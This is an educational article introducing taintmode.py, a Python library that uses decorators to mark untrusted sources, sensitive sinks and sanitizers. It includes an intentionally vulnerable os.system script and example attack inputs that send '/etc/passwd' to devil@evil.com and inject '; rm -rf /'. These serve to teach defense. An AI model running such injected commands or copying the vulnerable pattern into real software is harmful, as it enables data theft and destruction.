-------------------- Taint Mode in Python -------------------- .. class:: endnote +-------------------------------------------+-------------------------------------------+ | .. image:: ../taint/juanjodetraje.jpg |**Author:** Juanjo Conti | | :class: right foto | | | |Juanjo is an Information Systems Engineer. | | |Have been coding in Python for the last | | |5 years and use it for job, research and | | |fun. | | | | | |**Blog:** http://juanjoconti.com.ar | | | | | |**Email:** jjconti@gmail.com | | | | | |**Twitter:** @jjconti | | | | | | | | | | | | | +-------------------------------------------+-------------------------------------------+ This article is based on the paper *A Taint Mode for Python via a Library* that I wrote with Dr. Alejandro Russo from Chalmers University of Technology, Gothenburg, Sweden and was presented at OWASP App Sec Research 2010 conference. Opening words ------------- Vulnerabilities in web applications present threats to on-line systems. SQL injection and cross-site scripting attacks are among the most common threats found nowadays. These attacks are often result of improper or non-existent input validation. To help discover such vulnerabilities, popular web scripting languages like Perl, Ruby, PHP, and Python perform taint analysis. Such analysis is often implemented as an execution monitor, where the interpreter needs to be adapted to provide a taint mode. However, modifying interpreters might be a major task in its own right. In fact, it is very likely that new releases of interpreters require to be adapted to provide a taint mode. Differently from previous approaches, taintmode.py provides taint analysis for Python via a library written entirely in Python, and thus avoiding modifications in the interpreter. The concepts of classes, decorators and dynamic dispatch makes our solution lightweight, easy to use, and particularly neat. With little or no effort, the library can be adapted to work with different Python interpreters. Taint Analysis concepts ----------------------- First, let's talk about the basic concepts: **Untrusted Sources**. Untrusted data is marked as tainted. Examples of this are: any data received as a GET or POST parameter, HTTP headers and AJAX requests. One may also consider marking data from a persistence layer as tainted. A database may have been tampered with outside the application, or the data could have been intercepted and modified in transit. **Sensitive Sinks** are those points in the system where we don't want unvalidated data to arrive because an attack can be masked in the them. Some examples of sensitive sinks are Browser or HTML template engine, SQL, OS or LDAP interpreter; or even the Python interpreter. The third element in scene are the sanitization methods; they allow us to escape, encode or validate input data to make them fit to be sent to any sink. An example of a sanitization function is Python's cgi.escape: .. code-block:: pycon >>> import cgi >>> cgi.escape("") "<script>alert('this is an attack')</script>" How to use it? -------------- This is an easy example on purpose; it lets us understand the concepts without worrying about the problem: .. code-block:: python import sys import os def get_data(args): return args[1], args[2] usermail, file = get_data(sys.argv) cmd = 'mail -s "Requested file" ' + usermail + ' < ' + file os.system(cmd) The script receives an email address and a file name as input arguments. As a result, it sends the file to its owner by mail. The problem with this application is that the author didn't have in mind some alternative uses that an attacker could try. Some examples are: .. code-block:: bash python email.py alice@domain.se ./reportJanuary.xls python email.py devil@evil.com '/etc/passwd' python email.py devil@evil.com '/etc/passwd ; rm -rf / ' The first example is the correct use of the application, the one in the programmer's mind when it was written. The second one shows the first vulnerability; an attacker may send himself the content of /etc/passwd. The third example shows an even harder situation; the attacker not only steals system sensitive information but also erases its files. Of course, the execution of this scenario depends on how the server is configured and the privileges of the attacker at the moment of executing the application; but I think you got the idea. So... how could this library help the programmer to be aware of these problems and fix them? The first step is to import the components of the library and mark sensitives sinks and untrusted sources. The modified version of the program is: .. code-block:: python import sys import os from taintmode import untrusted, ssink, cleaner, OSI os.system = ssink(OSI)(os.system) @untrusted def get_data(args): return [args[1], args[2]] usermail, filename = get_data(sys.argv) cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename os.system(cmd) Note that we need to mark the get_data function as an untrusted source (with the untrusted decorator) and os.system as a sink sensitive to Operating System Injection (OSI) attacks. Now, when we try to run the program (it's not important if we are trying to make an attack or not) we get this message in the standard output: .. code-block:: bash $ python email.py jjconti@gmail.com myNotes.txt =============================================================================== Violation in line 14 from file email.py Tainted value: mail -s "Requested file" jjconti@gmail.com < miNotes.txt ------------------------------------------------------------------------------- usermail, filename = get_data(sys.argv) cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename --> os.system(cmd) =============================================================================== The Library intercepts the execution just before the untrusted datum reach the sensitive sink and inform it. The next step is add a cleaning function to sanitize the input data: .. code-block:: python import sys import os from taintmode import untrusted, ssink, cleaner, OSI from cleaners import clean_osi clean_osi = cleaner(OSI)(clean_osi) os.system = ssink(OSI)(os.system) @untrusted def get_data(args): return [args[1], args[2]] usermail, filename = get_data(sys.argv) usermail = clean_osi(usermail) filename = clean_osi(filename) cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename os.system(cmd) In this final example we import clean_osi, a function capable to clean input data against OSI attacks and in the next line we mark it as capable of doing it (this is required by the library). Finally, we use the function to clean the program inputs. If we execute the program now, it'll run normally. How does it work? ----------------- The library uses ids for the different vulnerabilities you are working with; these are called tags. It also provides decorators to mark different parts of the program (classes, methods or functions) as any of the three elements mentioned in the section about Taint Analysis. untrusted ~~~~~~~~~ untrusted is a decorator that indicates us the values returned by a function or method aren't to be trusted. Untrusted values can be tainted with any vulnerability, so they are marked as tainted with all the kinds of stain. If you have access to the function or method definition, for example if it's part of your codebase, the decorator can be applied using Python's syntactic sugar: .. code-block:: python @untrusted def from_the_outside(): ... While using third-party modules, we still can apply the decorator. The next example is from a program written using the web.py framework: .. code-block:: python import web web.input = untrusted(web.input) ssink ~~~~~ The ssink decorator must be used to mark those functions or methods that we don't want to be reached for tainted values. We call them sensitive sinks. These sinks are sensitive to a kind of vulnerability, and must be specified when the decorator is used. For example, the Python eval function is a sensitive sink to Interpreter Injection attacks. The way we mark it as that is: .. code-block:: python eval = ssink(II)(eval) The web.py framework offers SQL Injection sensitive sink examples: .. code-block:: python import web db = web.database(dbn="sqlite", db=DB_NAME) db.delete = ssink(SQLI)(db.delete) db.select = ssink(SQLI)(db.select) db.insert = ssink(SQLI)(db.insert) Like the rest of decorators, if the sensitive sink is defined in our code, we can use syntactic sugar: .. code-block:: python @ssink(XSS): def render_answer(input): ... The decorator can also be used without specifying a vulnerability. In this case, the sink is marked as sensitive to every kind of vulnerability, although this is not a very common use case: .. code-block:: python @ssink(): def very_sensitive(input): ... When an X tainted value reaches an X sensitive sink, we are facing the existence of a vulnerability and an appropriated mechanism is executed. cleaner ~~~~~~~ cleaner is a decorator used to tell that a method or function is able to clean stains on a value. For example, the plain_text function removes HTML code from its input and returns the new clean value: .. code-block:: python >>> plain_text("This is bold") 'This is bold' >>> plain_text("Click here") 'Click here' This kind of functions are associated with a determined kind of vulnerability; so the right way to use the cleaner decorator is specifying the kind of stain. Again, there are two was of doing it. In the definition: .. code-block:: python @cleaner(XSS) def plain_text(input): ... or before we start using the function in our program: .. code-block:: python plain_text = cleaner(XSS)(plain_text) Taint aware ~~~~~~~~~~~ One of the main parts of the library takes care of tracking the taint information for built-in classes (like int or str). The library dynamically defines subclasses of these to add an attribute that alows that tracking; for each object the attribute consists of a set of tags representing the taints the object has in a certain moment of the execution. The objects are considered untainted when the tags set is empty. In the context of the library, these subclasses are called *taint-aware classes*. The inherited methods of built-in classes are redefined to make them capable to propagate the taint information. For example, if a and b are tainted objects, c will have the union of the taints of both: .. code-block:: python c = a.action(b) Present state ------------- In this brief article I've exposed the main characteristics of the library; to know more advanced features and other implementation details you can visit http://www.juanjoconti.com.ar/taint/ More information & links ------------------------ * OWASP App Sec 2010: http://alturl.com/5u94e * OWASP: http://www.owasp.org * Python security: http://www.pythonsecurity.org